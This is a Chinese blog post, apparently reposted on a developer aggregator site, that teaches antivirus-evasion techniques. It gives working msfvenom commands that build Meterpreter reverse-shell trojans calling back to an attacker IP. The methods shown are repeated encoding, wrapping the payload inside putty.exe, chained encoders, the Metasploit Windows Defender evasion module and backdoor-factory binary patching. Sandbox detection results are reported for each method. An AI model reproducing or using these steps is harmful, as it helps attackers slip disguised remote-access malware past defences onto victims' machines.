我是靠谱客的博主 开心铃铛,最近开发中收集的这篇文章主要介绍常见的几种免杀方法,觉得挺不错的,现在分享给大家,希望可以做个参考。

概述

攻击机kali:192.168.1.11         靶机Windows7:192.168.1.18

1、自编码免杀

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.11 lport=4444 -e x86/shikata_ga_nai -i 15 -f exe -o shell.exe

开启本地监听并在靶机运行木马,shell反弹成功,木马程序正常使用

微步沙箱检测结果,检出率近一半,效果一般

 ​​​

2、自捆绑免杀

        在生成payload时可以使用捆绑功能,使用msfvenom的 -x 参数可以指定一个自定义的可执行文件作为模板,并将payload嵌入其中,-x 后跟对应的文件路径即可。示例中已在当前文件夹下准备好了模板

msfvenom -x putty.exe -p windows/meterpreter/reverse_tcp lhost=192.168.1.11 lport=4444 -f exe -o shell2.exe

靶机运行木马成功反弹shell,木马可正常使用

 微步检测结果,检出率近一半,效果一般

3、自捆绑+编码免杀

msfvenom -x putty.exe -p windows/meterpreter/reverse_tcp lhost=192.168.1.11 lport=4444 -e x86/shikata_ga_nai -i 15 -f exe -o shell3.exe

 在靶机运行木马反弹shell成功

微步沙箱检测结果,免杀效果一般 

4、多重编码+捆绑免杀

        msfvenom的encoder编码器可以对payload进行一定程度的免杀,同时还可以使用msfvenom多重编码功能,通过管道,让msfvenom用不同的编码器反复编码进行混淆。

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 lhost=192.168.1.11 lport=4444 -f raw | msfvenom -e x86/alpha_upper -a x86 --platform windows -i 5 -f raw | msfvenom -e cmd/powershell_base64 -a x86 --platform windows -x putty.exe -f exe -o shell4.exe

靶机运行木马反弹shell成功,免杀效果一般(免杀方式可多种方式混合使用)

 5、evasion免杀

       2019年1月,metasploit升级为5.0,引入了一个新模块叫evasion模块,官方称这个模块可以创建反杀毒软件的木马

模块:windows/windows_defender_exe、windows/windows_defender_js_hta

msf6 exploit(multi/handler) > use windows/windows_defender_exe
msf6 evasion(windows/windows_defender_exe) > set filename shell5.exe
msf6 evasion(windows/windows_defender_exe) > set lhost 192.168.1.11
msf6 evasion(windows/windows_defender_exe) > set lport 4444
msf6 evasion(windows/windows_defender_exe) > run

 靶机运行木马反弹shell成功,

6、backdoor factory

        backdoor-factory,又称后门工厂(BFD),BFD也是一款老牌的免杀神器,其作者曾经在2015年的blackhat大会上介绍过该工具,但是作者已经于2017年停止更新,免杀效果至今还算是不错。

检查宿主是否支持patch

python backdoor.py -f 程序路径 -S

-f:指定测试程序

-S:检查程序是否支持

 查看宿主程序代码缝隙

python backdoor.py -f 程序路径 -c

-c:查看程序代码缝隙

 获取该文件的可用payload

python backdoor.py -f 程序路径 -s show

-s:选择使用payload

 指定payload、回连地址和端口、输出程序名、指定使用的代码缝隙

python backdoor.py -f 程序路径 -s 指定payload -J -H 回连地址 -P 回连端口 -o 输出程序名

-J:使用多代码缝隙注入

 微步沙箱检测,免杀效果较好

 生成shellcode

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.11 lport=4444 -e x86/shikata_ga_nai -i 10 -f raw -o shellcode.c

注入shellcode

python backdoor.py  -f 程序路径 -s 指定payload -U 指定shellcode -H 回连ip -P 回连端口 -o 输出程序名

 

最后

以上就是开心铃铛为你收集整理的常见的几种免杀方法的全部内容,希望文章能够帮你解决常见的几种免杀方法所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(41)

评论列表共有 0 条评论

立即
投稿
返回
顶部